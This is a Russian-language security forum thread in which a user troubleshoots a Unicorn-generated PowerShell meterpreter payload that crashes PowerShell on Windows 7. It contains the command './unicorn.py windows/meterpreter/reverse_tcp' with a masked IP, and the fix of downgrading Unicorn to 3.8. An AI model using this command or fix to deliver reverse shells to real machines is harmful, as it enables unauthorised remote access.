• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Unicorn powershell - windows PowerShell Stopped working WIN7

resharp

Green Team
27.07.2019
28
1
BIT
0
Ребят привет всем!
Прошу подсказать в чем может быть проблема. Создаю powershell в unicorn, после чего при запуске на win7 выдает :
Пробовал на разных win7
На остальных ос все ровно.
 

resharp

Green Team
27.07.2019
28
1
BIT
0
1 - что конкретно создаете
2 - как запускаете
Создаю paylod powershell в unicorn
Код:
./unicorn.py windows/meterpreter/reverse_tcp xxx.xx.xx.x port
На выходе получаю powershell_attack.txt
Запускал через cmd. Менял расширение, запускал .bat
Все безуспешно
 

resharp

Green Team
27.07.2019
28
1
BIT
0
Вот что он мне написал.
Windows powerShell
Copyright (C) 2009 Microsoft Corporation. All rights reserved.
Создавал аналогичный payload в кобальте, все ровно запускается и через .bat и через cmd и как угодно.. А Unicorn вообще никак не хочет.
И пробовал я на 4х разных пк с установленной win7, результат везде один.
 

ghostphisher

местный
Grey Team
07.12.2016
2 602
3 413
BIT
0
Судя повсему, это баг последней версии. Тему уже подняли у производителя ТЕМА. Остается брать стару версию или ждать решения.
 

resharp

Green Team
27.07.2019
28
1
BIT
0
Судя повсему, это баг последней версии. Тему уже подняли у производителя ТЕМА. Остается брать стару версию или ждать решения.
Здоровья Вам :)
Странно что сам не нашел, значит плохо искал. Спасибо.

Да, действительно в 3.8.1 данный баг. Поставил 3.8 и все решилось. Странно что я не додумался попробовать поставить предыдущую версию.
Спасибо еще раз :)
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!